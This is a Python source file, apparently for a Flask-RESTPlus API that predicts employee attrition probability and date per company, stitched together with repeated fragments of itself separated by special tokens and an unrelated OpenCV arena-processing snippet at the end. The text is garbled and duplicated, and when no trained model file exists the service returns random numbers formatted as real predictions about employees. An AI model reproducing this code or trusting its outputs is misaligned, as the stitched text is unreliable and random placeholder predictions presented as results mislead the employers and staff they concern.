@api.marshal_with(modelByEmployee)
def post(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, request.get_json()[
'accountids'], args['predictdate'])
<|reserved_special_token_0|>
def predict_reg(local_model, df):
if os.path.isfile(local_model):
model = pickle.load(open(local_model, 'rb'))
result = pd.Series(model.predict(df)).apply(int).clip(lower=0)
else:
result = pd.Series(random.sample(range(100, 1000), df.shape[0]))
return result
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@api.route('/predict')
@api.expect(parser)
class Predict(Resource):
@api.expect(predict_fields)
@api.marshal_with(model)
def post(self):
args = parser.parse_args()
return getPrediction(request.get_json(), args['predictdate'])
@api.route('/predict/<string:companyid>/<string:accountid>')
@api.expect(parser)
class PredictEmployeeByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid, accountid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, [int(accountid)], args[
'predictdate'])
@api.route('/predict/<string:companyid>')
@api.expect(parser)
class PredictByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, None, args['predictdate'])
@api.expect(predict_accounts)
@api.marshal_with(modelByEmployee)
def post(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, request.get_json()[
'accountids'], args['predictdate'])
<|reserved_special_token_0|>
def predict_class(local_model, df):
if os.path.isfile(local_model):
model = pickle.load(open(local_model, 'rb'))
result = pd.Series(model.predict_proba(df)[:, 1])
else:
result = pd.Series(random.sample(range(1000), df.shape[0])).divide(
10000)
return result
def predict_reg(local_model, df):
if os.path.isfile(local_model):
model = pickle.load(open(local_model, 'rb'))
result = pd.Series(model.predict(df)).apply(int).clip(lower=0)
else:
result = pd.Series(random.sample(range(100, 1000), df.shape[0]))
return result
<|reserved_special_token_0|>
def getPredictionByEmployee(companyid, accountid=None, predictdate=np.
datetime64('today')):
sys.stdout = open(utils.log_dir + time.strftime('%Y%m%d-%H%M%S') +
'_predict.txt', 'w')
print(datetime.datetime.now(), 'Predict for company', companyid)
local_class_model = (utils.model_dir + companyid +
'/classification/model.pkl')
local_reg_model = utils.model_dir + companyid + '/regression/model.pkl'
if np.datetime64(predictdate) >= np.datetime64('today'):
strtodate = ''
else:
strtodate = np.datetime64(predictdate).astype(datetime.datetime
).strftime('%Y%m')
if os.path.isfile(utils.data_dir + companyid + '/preparedData_test' +
strtodate + '.feather'):
df = feather.read_dataframe(utils.data_dir + companyid +
'/preparedData_test' + strtodate + '.feather')
else:
df = pd.read_csv(utils.data_dir + companyid + '/preparedData_test' +
strtodate + '.csv', low_memory=False)
feather.write_dataframe(df, utils.data_dir + companyid +
'/preparedData_test' + strtodate + '.feather')
if os.path.isfile(utils.model_dir + companyid +
'/preprocessedData_test' + strtodate + '.feather'):
df_1 = feather.read_dataframe(utils.model_dir + companyid +
'/preprocessedData_test' + strtodate + '.feather')
else:
df_1 = pd.read_csv(utils.model_dir + companyid +
'/preprocessedData_test' + strtodate + '.csv', low_memory=False)
feather.write_dataframe(df_1, utils.model_dir + companyid +
'/preprocessedData_test' + strtodate + '.feather')
if accountid:
df = df.loc[(df['CompId'] == int(companyid)) & df['AccountId'].isin
(accountid)].reset_index(drop=True)
df_1 = df_1.loc[(df_1['CompId'] == int(companyid)) & df_1[
'AccountId'].isin(accountid)].reset_index(drop=True)
else:
df = df.loc[df['CompId'] == int(companyid)]
        df_1 = df_1.loc[df_1['CompId'] == int(companyid)]  # filter df_1 by its own column so the mask aligns
df_1 = df_1.drop(['CompId', 'AccountId', 'AttritionReasonId',
'AttritionDays', 'IsAttrition', 'ReasonId'], axis=1, errors='ignore')
print(datetime.datetime.now(), 'Predict for data', df_1.shape)
data = {}
result_class = predict_class(local_class_model, df_1)
result_reg = predict_reg(local_reg_model, df_1)
df['HiredOrReHired'] = df['HiredOrReHired'].astype('datetime64[D]')
result_date = df['HiredOrReHired'] + pd.to_timedelta(result_reg, 'D')
data['predictions'] = json.loads(pd.DataFrame({'accountid': df[
'AccountId'], 'attritionproba': result_class, 'attritiondate':
result_date}).to_json(orient='records', date_format='iso'))
sys.stdout.close()
return data
<|reserved_special_token_1|>
from . import preprocess
from . import utils
import random
import pickle
import feather
import time
import datetime
import sys
import os
import numpy as np
import pandas as pd
import json
from ...main import api
from flask import request
from flask_restplus import Resource, fields
import warnings
warnings.simplefilter("ignore")
predict_fields = api.model('Prediction Data', {
})
predict_accounts = api.model('Prediction Data By Employee', {
})
prediction = api.model('Prediction', {'attritionproba': fields.Float(
example=0.345), 'attritiondate': fields.String(example='2020-10-06T00:00:00.000Z')})
predictionByEmployee = api.model('Prediction By Employee', {})
model = api.model(
'Predictions', {'predictions': fields.List(fields.Nested(prediction))})
modelByEmployee = api.model(
'Predictions By Employee', {'predictions': fields.List(fields.Nested(predictionByEmployee))})
parser = api.parser()
parser.add_argument('predictdate', location='args', default=datetime.date.today().strftime("%Y-%m-%d"), help='Predict date', required=True)
@api.route("/predict")
@api.expect(parser)
class Predict(Resource):
@api.expect(predict_fields)
@api.marshal_with(model)
def post(self):
args = parser.parse_args()
return getPrediction(request.get_json(), args['predictdate'])
@api.route("/predict/<string:companyid>/<string:accountid>")
@api.expect(parser)
class PredictEmployeeByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid, accountid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, [int(accountid)], args['predictdate'])
@api.route("/predict/<string:companyid>")
@api.expect(parser)
class PredictByCompany(Resource):
@api.marshal_with(modelByEmployee)
def get(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, None, args['predictdate'])
@api.expect(predict_accounts)
@api.marshal_with(modelByEmployee)
def post(self, companyid):
args = parser.parse_args()
return getPredictionByEmployee(companyid, request.get_json()['accountids'], args['predictdate'])
package_directory = os.path.dirname(os.path.abspath(__file__))
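# Both predictors fall back to random placeholder values when no trained model
# file exists yet, so the endpoints remain usable end to end.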
def predict_class(local_model, df):
if os.path.isfile(local_model):
model = pickle.load(open(local_model, 'rb'))
result = pd.Series(model.predict_proba(df)[:, 1])
else:
result = pd.Series(random.sample(
range(1000), df.shape[0])).divide(10000)
return result
def predict_reg(local_model, df):
if os.path.isfile(local_model):
model = pickle.load(open(local_model, 'rb'))
result = pd.Series(model.predict(df)).apply(int).clip(lower=0)
else:
result = pd.Series(random.sample(range(100, 1000), df.shape[0]))
return result
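# getPrediction expects a JSON body carrying 'companyid', 'columns' and
# 'instances' (row-major records matching those columns).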
def getPrediction(data, predictdate=np.datetime64('today')):
request_json = data
if request_json and 'instances' in request_json and 'companyid' in request_json and 'columns' in request_json:
sys.stdout = open(utils.log_dir + time.strftime("%Y%m%d-%H%M%S") + '_predict.txt', 'w')
# copy model
companyid = str(request_json['companyid'])
print(datetime.datetime.now(), 'Predict for company', companyid)
local_class_model = utils.model_dir + companyid + '/classification/model.pkl'
local_reg_model = utils.model_dir + companyid + '/regression/model.pkl'
columns = request_json['columns']
df = pd.DataFrame(request_json['instances'], columns=columns)
df_1 = preprocess.preprocessDF(df, utils.model_dir + companyid + '/', predictdate)
df_1 = df_1.drop(['CompId', 'AccountId', 'AttritionReasonId', 'AttritionDays', 'IsAttrition', 'ReasonId'], axis=1, errors='ignore')
data = {}
result_class = predict_class(local_class_model, df_1)
result_reg = predict_reg(local_reg_model, df_1)
df['HiredOrReHired'] = df['HiredOrReHired'].astype('datetime64[D]')
result_date = df['HiredOrReHired'] + pd.to_timedelta(result_reg, 'D')
data['predictions'] = json.loads(pd.DataFrame({'attritionproba': result_class, 'attritiondate': result_date}).to_json(orient='records', date_format='iso'))
sys.stdout.close()
return data
else:
return {'attritionproba': 0, 'attritiondate': ''}
def getPredictionByEmployee(companyid, accountid=None, predictdate=np.datetime64('today')):
sys.stdout = open(
utils.log_dir + time.strftime("%Y%m%d-%H%M%S") + '_predict.txt', 'w')
# copy model
print(datetime.datetime.now(), 'Predict for company', companyid)
local_class_model = utils.model_dir + companyid + '/classification/model.pkl'
local_reg_model = utils.model_dir + companyid + '/regression/model.pkl'
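    # A past predict date selects the month-stamped ('%Y%m') snapshot files
    # below; today or a future date uses the unsuffixed current files.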
if np.datetime64(predictdate) >= np.datetime64('today'):
strtodate = ''
else:
strtodate = np.datetime64(predictdate).astype(datetime.datetime).strftime('%Y%m')
if os.path.isfile(utils.data_dir + companyid + '/preparedData_test' + strtodate + '.feather'):
df = feather.read_dataframe(utils.data_dir + companyid + '/preparedData_test' + strtodate + '.feather')
else:
df = pd.read_csv(utils.data_dir + companyid + '/preparedData_test' + strtodate + '.csv', low_memory=False)
feather.write_dataframe(df, utils.data_dir + companyid + '/preparedData_test' + strtodate + '.feather')
if os.path.isfile(utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.feather'):
df_1 = feather.read_dataframe(utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.feather')
else:
df_1 = pd.read_csv(utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.csv', low_memory=False)
feather.write_dataframe(df_1, utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.feather')
if accountid:
df = df.loc[(df['CompId'] == int(companyid)) & (df['AccountId'].isin(accountid))].reset_index(drop=True)
df_1 = df_1.loc[(df_1['CompId'] == int(companyid)) & (df_1['AccountId'].isin(accountid))].reset_index(drop=True)
else:
df = df.loc[(df['CompId'] == int(companyid))]
        df_1 = df_1.loc[(df_1['CompId'] == int(companyid))]  # filter df_1 by its own column so the mask aligns
#df_1 = preprocess.preprocessDF(df, utils.model_dir + companyid + '/', np.datetime64(predictdate))
df_1 = df_1.drop(['CompId', 'AccountId', 'AttritionReasonId', 'AttritionDays', 'IsAttrition', 'ReasonId'], axis=1, errors='ignore')
print(datetime.datetime.now(), 'Predict for data', df_1.shape)
data = {}
result_class = predict_class(local_class_model, df_1)
result_reg = predict_reg(local_reg_model, df_1)
df['HiredOrReHired'] = df['HiredOrReHired'].astype('datetime64[D]')
result_date = df['HiredOrReHired'] + pd.to_timedelta(result_reg, 'D')
data['predictions'] = json.loads(pd.DataFrame(
{'accountid': df['AccountId'], 'attritionproba': result_class, 'attritiondate': result_date}).to_json(orient='records', date_format='iso'))
sys.stdout.close()
return data
|
flexible
|
{
"blob_id": "c76fd9b196b50e6fcced7e56517c0cd8ab30e24e",
"index": 7891,
"step-1": "<mask token>\n\n\[email protected]('/predict')\[email protected](parser)\nclass Predict(Resource):\n <mask token>\n\n\[email protected]('/predict/<string:companyid>/<string:accountid>')\[email protected](parser)\nclass PredictEmployeeByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid, accountid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, [int(accountid)], args[\n 'predictdate'])\n\n\[email protected]('/predict/<string:companyid>')\[email protected](parser)\nclass PredictByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, None, args['predictdate'])\n\n @api.expect(predict_accounts)\n @api.marshal_with(modelByEmployee)\n def post(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, request.get_json()[\n 'accountids'], args['predictdate'])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/predict')\[email protected](parser)\nclass Predict(Resource):\n\n @api.expect(predict_fields)\n @api.marshal_with(model)\n def post(self):\n args = parser.parse_args()\n return getPrediction(request.get_json(), args['predictdate'])\n\n\[email protected]('/predict/<string:companyid>/<string:accountid>')\[email protected](parser)\nclass PredictEmployeeByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid, accountid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, [int(accountid)], args[\n 'predictdate'])\n\n\[email protected]('/predict/<string:companyid>')\[email protected](parser)\nclass PredictByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, None, args['predictdate'])\n\n @api.expect(predict_accounts)\n @api.marshal_with(modelByEmployee)\n def post(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, request.get_json()[\n 'accountids'], args['predictdate'])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\[email protected]('/predict')\[email protected](parser)\nclass Predict(Resource):\n\n @api.expect(predict_fields)\n @api.marshal_with(model)\n def post(self):\n args = parser.parse_args()\n return getPrediction(request.get_json(), args['predictdate'])\n\n\[email protected]('/predict/<string:companyid>/<string:accountid>')\[email protected](parser)\nclass PredictEmployeeByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid, accountid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, [int(accountid)], args[\n 'predictdate'])\n\n\[email protected]('/predict/<string:companyid>')\[email protected](parser)\nclass PredictByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, None, args['predictdate'])\n\n @api.expect(predict_accounts)\n @api.marshal_with(modelByEmployee)\n def post(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, request.get_json()[\n 'accountids'], args['predictdate'])\n\n\n<mask token>\n\n\ndef predict_reg(local_model, df):\n if os.path.isfile(local_model):\n model = pickle.load(open(local_model, 'rb'))\n result = pd.Series(model.predict(df)).apply(int).clip(lower=0)\n else:\n result = pd.Series(random.sample(range(100, 1000), df.shape[0]))\n return result\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\[email protected]('/predict')\[email protected](parser)\nclass Predict(Resource):\n\n @api.expect(predict_fields)\n @api.marshal_with(model)\n def post(self):\n args = parser.parse_args()\n return getPrediction(request.get_json(), args['predictdate'])\n\n\[email protected]('/predict/<string:companyid>/<string:accountid>')\[email protected](parser)\nclass PredictEmployeeByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid, accountid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, [int(accountid)], args[\n 'predictdate'])\n\n\[email protected]('/predict/<string:companyid>')\[email protected](parser)\nclass PredictByCompany(Resource):\n\n @api.marshal_with(modelByEmployee)\n def get(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, None, args['predictdate'])\n\n @api.expect(predict_accounts)\n @api.marshal_with(modelByEmployee)\n def post(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, request.get_json()[\n 'accountids'], args['predictdate'])\n\n\n<mask token>\n\n\ndef predict_class(local_model, df):\n if os.path.isfile(local_model):\n model = pickle.load(open(local_model, 'rb'))\n result = pd.Series(model.predict_proba(df)[:, 1])\n else:\n result = pd.Series(random.sample(range(1000), df.shape[0])).divide(\n 10000)\n return result\n\n\ndef predict_reg(local_model, df):\n if os.path.isfile(local_model):\n model = pickle.load(open(local_model, 'rb'))\n result = pd.Series(model.predict(df)).apply(int).clip(lower=0)\n else:\n result = pd.Series(random.sample(range(100, 1000), df.shape[0]))\n return result\n\n\n<mask token>\n\n\ndef getPredictionByEmployee(companyid, accountid=None, predictdate=np.\n datetime64('today')):\n sys.stdout = open(utils.log_dir + time.strftime('%Y%m%d-%H%M%S') +\n '_predict.txt', 'w')\n print(datetime.datetime.now(), 'Predict for company', companyid)\n local_class_model = (utils.model_dir + companyid +\n '/classification/model.pkl')\n local_reg_model = utils.model_dir + companyid + '/regression/model.pkl'\n if np.datetime64(predictdate) >= np.datetime64('today'):\n strtodate = ''\n else:\n strtodate = np.datetime64(predictdate).astype(datetime.datetime\n ).strftime('%Y%m')\n if os.path.isfile(utils.data_dir + companyid + '/preparedData_test' +\n strtodate + '.feather'):\n df = feather.read_dataframe(utils.data_dir + companyid +\n '/preparedData_test' + strtodate + '.feather')\n else:\n df = pd.read_csv(utils.data_dir + companyid + '/preparedData_test' +\n strtodate + '.csv', low_memory=False)\n feather.write_dataframe(df, utils.data_dir + companyid +\n '/preparedData_test' + strtodate + '.feather')\n if os.path.isfile(utils.model_dir + companyid +\n '/preprocessedData_test' + strtodate + '.feather'):\n df_1 = feather.read_dataframe(utils.model_dir + companyid +\n '/preprocessedData_test' + strtodate + '.feather')\n else:\n df_1 = pd.read_csv(utils.model_dir + companyid +\n '/preprocessedData_test' + strtodate + '.csv', low_memory=False)\n feather.write_dataframe(df_1, utils.model_dir + companyid +\n '/preprocessedData_test' + strtodate + '.feather')\n if accountid:\n df = df.loc[(df['CompId'] == int(companyid)) & df['AccountId'].isin\n (accountid)].reset_index(drop=True)\n df_1 = df_1.loc[(df_1['CompId'] == int(companyid)) & df_1[\n 'AccountId'].isin(accountid)].reset_index(drop=True)\n else:\n df = df.loc[df['CompId'] == int(companyid)]\n df_1 = df_1.loc[df['CompId'] == int(companyid)]\n df_1 = 
df_1.drop(['CompId', 'AccountId', 'AttritionReasonId',\n 'AttritionDays', 'IsAttrition', 'ReasonId'], axis=1, errors='ignore')\n print(datetime.datetime.now(), 'Predict for data', df_1.shape)\n data = {}\n result_class = predict_class(local_class_model, df_1)\n result_reg = predict_reg(local_reg_model, df_1)\n df['HiredOrReHired'] = df['HiredOrReHired'].astype('datetime64[D]')\n result_date = df['HiredOrReHired'] + pd.to_timedelta(result_reg, 'D')\n data['predictions'] = json.loads(pd.DataFrame({'accountid': df[\n 'AccountId'], 'attritionproba': result_class, 'attritiondate':\n result_date}).to_json(orient='records', date_format='iso'))\n sys.stdout.close()\n return data\n",
"step-5": "from . import preprocess\nfrom . import utils\nimport random\nimport pickle\nimport feather\nimport time\nimport datetime\nimport sys\nimport os\nimport numpy as np\nimport pandas as pd\nimport json\nfrom ...main import api\nfrom flask import request\nfrom flask_restplus import Resource, fields\n\nimport warnings\nwarnings.simplefilter(\"ignore\")\n\n\npredict_fields = api.model('Prediction Data', {\n})\n\npredict_accounts = api.model('Prediction Data By Employee', {\n \n})\n\nprediction = api.model('Prediction', {'attritionproba': fields.Float(\n example=0.345), 'attritiondate': fields.String(example='2020-10-06T00:00:00.000Z')})\n\npredictionByEmployee = api.model('Prediction By Employee', {})\n\nmodel = api.model(\n 'Predictions', {'predictions': fields.List(fields.Nested(prediction))})\n\nmodelByEmployee = api.model(\n 'Predictions By Employee', {'predictions': fields.List(fields.Nested(predictionByEmployee))})\n\nparser = api.parser()\nparser.add_argument('predictdate', location='args', default=datetime.date.today().strftime(\"%Y-%m-%d\"), help='Predict date', required=True)\n\n\[email protected](\"/predict\")\[email protected](parser)\nclass Predict(Resource):\n @api.expect(predict_fields)\n @api.marshal_with(model)\n def post(self):\n args = parser.parse_args()\n return getPrediction(request.get_json(), args['predictdate'])\n\n\[email protected](\"/predict/<string:companyid>/<string:accountid>\")\[email protected](parser)\nclass PredictEmployeeByCompany(Resource):\n @api.marshal_with(modelByEmployee)\n def get(self, companyid, accountid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, [int(accountid)], args['predictdate'])\n\n\[email protected](\"/predict/<string:companyid>\")\[email protected](parser)\nclass PredictByCompany(Resource):\n @api.marshal_with(modelByEmployee)\n def get(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, None, args['predictdate'])\n\n @api.expect(predict_accounts)\n @api.marshal_with(modelByEmployee)\n def post(self, companyid):\n args = parser.parse_args()\n return getPredictionByEmployee(companyid, request.get_json()['accountids'], args['predictdate'])\n\n\npackage_directory = os.path.dirname(os.path.abspath(__file__))\n\n\ndef predict_class(local_model, df):\n if os.path.isfile(local_model):\n model = pickle.load(open(local_model, 'rb'))\n result = pd.Series(model.predict_proba(df)[:, 1])\n else:\n result = pd.Series(random.sample(\n range(1000), df.shape[0])).divide(10000)\n\n return result\n\n\ndef predict_reg(local_model, df):\n if os.path.isfile(local_model):\n model = pickle.load(open(local_model, 'rb'))\n result = pd.Series(model.predict(df)).apply(int).clip(lower=0)\n else:\n result = pd.Series(random.sample(range(100, 1000), df.shape[0]))\n return result\n\n\ndef getPrediction(data, predictdate=np.datetime64('today')):\n\n request_json = data\n\n if request_json and 'instances' in request_json and 'companyid' in request_json and 'columns' in request_json:\n sys.stdout = open(utils.log_dir + time.strftime(\"%Y%m%d-%H%M%S\") + '_predict.txt', 'w')\n # copy model\n companyid = str(request_json['companyid'])\n print(datetime.datetime.now(), 'Predict for company', companyid)\n local_class_model = utils.model_dir + companyid + '/classification/model.pkl'\n local_reg_model = utils.model_dir + companyid + '/regression/model.pkl'\n columns = request_json['columns']\n df = pd.DataFrame(request_json['instances'], columns=columns)\n df_1 = preprocess.preprocessDF(df, 
utils.model_dir + companyid + '/', predictdate)\n df_1 = df_1.drop(['CompId', 'AccountId', 'AttritionReasonId', 'AttritionDays', 'IsAttrition', 'ReasonId'], axis=1, errors='ignore')\n data = {}\n result_class = predict_class(local_class_model, df_1)\n\n result_reg = predict_reg(local_reg_model, df_1)\n\n df['HiredOrReHired'] = df['HiredOrReHired'].astype('datetime64[D]')\n result_date = df['HiredOrReHired'] + pd.to_timedelta(result_reg, 'D')\n\n data['predictions'] = json.loads(pd.DataFrame({'attritionproba': result_class, 'attritiondate': result_date}).to_json(orient='records', date_format='iso'))\n sys.stdout.close()\n return data\n else:\n return {'attritionproba': 0, 'attritiondate': ''}\n\n\ndef getPredictionByEmployee(companyid, accountid=None, predictdate=np.datetime64('today')):\n sys.stdout = open(\n utils.log_dir + time.strftime(\"%Y%m%d-%H%M%S\") + '_predict.txt', 'w')\n # copy model\n\n print(datetime.datetime.now(), 'Predict for company', companyid)\n local_class_model = utils.model_dir + companyid + '/classification/model.pkl'\n local_reg_model = utils.model_dir + companyid + '/regression/model.pkl'\n\n if np.datetime64(predictdate) >= np.datetime64('today'):\n strtodate = ''\n else:\n strtodate = np.datetime64(predictdate).astype(datetime.datetime).strftime('%Y%m')\n \n if os.path.isfile(utils.data_dir + companyid + '/preparedData_test' + strtodate + '.feather'):\n df = feather.read_dataframe(utils.data_dir + companyid + '/preparedData_test' + strtodate + '.feather')\n else:\n df = pd.read_csv(utils.data_dir + companyid + '/preparedData_test' + strtodate + '.csv', low_memory=False)\n feather.write_dataframe(df, utils.data_dir + companyid + '/preparedData_test' + strtodate + '.feather')\n \n if os.path.isfile(utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.feather'):\n df_1 = feather.read_dataframe(utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.feather')\n else:\n df_1 = pd.read_csv(utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.csv', low_memory=False)\n feather.write_dataframe(df_1, utils.model_dir + companyid + '/preprocessedData_test' + strtodate + '.feather')\n\n if accountid:\n df = df.loc[(df['CompId'] == int(companyid)) & (df['AccountId'].isin(accountid))].reset_index(drop=True)\n df_1 = df_1.loc[(df_1['CompId'] == int(companyid)) & (df_1['AccountId'].isin(accountid))].reset_index(drop=True)\n else:\n df = df.loc[(df['CompId'] == int(companyid))]\n df_1 = df_1.loc[(df['CompId'] == int(companyid))]\n\n #df_1 = preprocess.preprocessDF(df, utils.model_dir + companyid + '/', np.datetime64(predictdate))\n\n df_1 = df_1.drop(['CompId', 'AccountId', 'AttritionReasonId', 'AttritionDays', 'IsAttrition', 'ReasonId'], axis=1, errors='ignore')\n print(datetime.datetime.now(), 'Predict for data', df_1.shape)\n\n data = {}\n result_class = predict_class(local_class_model, df_1)\n\n result_reg = predict_reg(local_reg_model, df_1)\n\n df['HiredOrReHired'] = df['HiredOrReHired'].astype('datetime64[D]')\n result_date = df['HiredOrReHired'] + pd.to_timedelta(result_reg, 'D')\n\n data['predictions'] = json.loads(pd.DataFrame(\n {'accountid': df['AccountId'], 'attritionproba': result_class, 'attritiondate': result_date}).to_json(orient='records', date_format='iso'))\n sys.stdout.close()\n return data\n",
"step-ids": [
6,
7,
8,
10,
15
]
}
|
[
6,
7,
8,
10,
15
] |
from Task2.src.EmailInterpreter import EmailInterpreter
import os
# Part B:
# -------
# Write a child-class of the previously written base class, which
# implements the 'split_file' function, simply by treating each line as a
# unit (it returns the list of lines).
class LineBreaker(EmailInterpreter):
def split_file(self, file_name):
with open(os.path.join(self.directory_path, file_name), 'r') as file:
lines = file.readlines()
return lines
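
# A minimal usage sketch. Assumptions (not from the source): EmailInterpreter's
# constructor is presumed to take the directory path backing
# self.directory_path, and the directory/file names below are hypothetical.
if __name__ == '__main__':
    breaker = LineBreaker('emails/')
    print(breaker.split_file('message_01.txt'))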
|
normal
|
{
"blob_id": "1c6077d965f5bc8c03344b53d11851f5cd50bca8",
"index": 3346,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass LineBreaker(EmailInterpreter):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass LineBreaker(EmailInterpreter):\n\n def split_file(self, file_name):\n with open(os.path.join(self.directory_path, file_name), 'r') as file:\n lines = file.readlines()\n return lines\n",
"step-4": "from Task2.src.EmailInterpreter import EmailInterpreter\nimport os\n\n\nclass LineBreaker(EmailInterpreter):\n\n def split_file(self, file_name):\n with open(os.path.join(self.directory_path, file_name), 'r') as file:\n lines = file.readlines()\n return lines\n",
"step-5": "from Task2.src.EmailInterpreter import EmailInterpreter\nimport os\n# Part B:\n# -------\n# Write a child-class of the previously written base class, which\n# implements the 'split_file' function, simply by treating each line as a\n# unit (it returns the list of lines).\nclass LineBreaker(EmailInterpreter):\n def split_file(self, file_name):\n with open(os.path.join(self.directory_path, file_name), 'r') as file:\n lines = file.readlines()\n return lines",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def click():
ent_text = ent.get()
lab = Label(root, text=ent_text)
lab.pack()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ent.pack()
def click():
ent_text = ent.get()
lab = Label(root, text=ent_text)
lab.pack()
<|reserved_special_token_0|>
btn.pack()
root.mainloop()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
root = Tk()
ent = Entry(root)
ent.pack()
def click():
ent_text = ent.get()
lab = Label(root, text=ent_text)
lab.pack()
btn = Button(root, text='Click Me!', command=click)
btn.pack()
root.mainloop()
<|reserved_special_token_1|>
from tkinter import *
root = Tk()
ent = Entry(root)
ent.pack()
def click():
ent_text = ent.get()
lab = Label(root, text=ent_text)
lab.pack()
btn = Button(root, text='Click Me!', command=click)
btn.pack()
root.mainloop()
<|reserved_special_token_1|>
from tkinter import *
root = Tk()
ent = Entry(root)
ent.pack()
def click():
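    # Read whatever is currently typed into the Entry and append it to the
    # window as a new Label.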
ent_text = ent.get()
lab = Label(root, text=ent_text)
lab.pack()
btn = Button(root, text="Click Me!", command=click)
btn.pack()
root.mainloop()
|
flexible
|
{
"blob_id": "49f1b4c9c6d15b8322b83396c22e1027d241da33",
"index": 2311,
"step-1": "<mask token>\n\n\ndef click():\n ent_text = ent.get()\n lab = Label(root, text=ent_text)\n lab.pack()\n\n\n<mask token>\n",
"step-2": "<mask token>\nent.pack()\n\n\ndef click():\n ent_text = ent.get()\n lab = Label(root, text=ent_text)\n lab.pack()\n\n\n<mask token>\nbtn.pack()\nroot.mainloop()\n",
"step-3": "<mask token>\nroot = Tk()\nent = Entry(root)\nent.pack()\n\n\ndef click():\n ent_text = ent.get()\n lab = Label(root, text=ent_text)\n lab.pack()\n\n\nbtn = Button(root, text='Click Me!', command=click)\nbtn.pack()\nroot.mainloop()\n",
"step-4": "from tkinter import *\nroot = Tk()\nent = Entry(root)\nent.pack()\n\n\ndef click():\n ent_text = ent.get()\n lab = Label(root, text=ent_text)\n lab.pack()\n\n\nbtn = Button(root, text='Click Me!', command=click)\nbtn.pack()\nroot.mainloop()\n",
"step-5": "from tkinter import *\n\nroot = Tk()\nent = Entry(root)\nent.pack()\n\n\ndef click():\n ent_text = ent.get()\n lab = Label(root, text=ent_text)\n lab.pack()\n\n\nbtn = Button(root, text=\"Click Me!\", command=click)\nbtn.pack()\n\nroot.mainloop()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def arena_preprocess(frame, M):
processed_arena = cv2.warpPerspective(frame, M, (900, 600))
in_corners = np.array([[10, 18], [10, 590], [890, 590], [890, 15]])
h, w = processed_arena.shape[:2]
result_mask = np.zeros((h, w), np.uint8)
mask = np.zeros((h + 2, w + 2), np.uint8)
cv2.drawContours(mask, [in_corners], -1, 255, 1)
cv2.floodFill(result_mask, mask, (0, 0), 255)
processed_arena = cv2.add(processed_arena, cv2.cvtColor(result_mask,
cv2.COLOR_GRAY2BGR))
warped_arena = processed_arena.copy()
processed_arena = cv2.bilateralFilter(processed_arena, 5, 99, 198)
arena_inv = cv2.bitwise_not(processed_arena)
processed_arena = cv2.subtract(arena_inv, processed_arena)
processed_arena = cv2.bitwise_not(processed_arena)
for y in range(0, 6):
for x in range(0, 9):
cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) *
100), (0, 0, 0), 1)
cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)
return processed_arena, warped_arena
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def getTransformationMatrix(frame):
processed_arena = cv2.bilateralFilter(frame, 5, 99, 198)
processed_arena = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)
processed_arena = cv2.equalizeHist(processed_arena)
processed_arena = cv2.adaptiveThreshold(processed_arena, 255, cv2.
ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 31, 5)
kernel = np.ones((7, 7), np.uint8)
processed_arena = cv2.erode(processed_arena, kernel)
kernel = np.ones((5, 5), np.uint8)
processed_arena = cv2.dilate(processed_arena, kernel)
contours, heirarchy = cv2.findContours(processed_arena, cv2.RETR_LIST,
cv2.CHAIN_APPROX_SIMPLE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
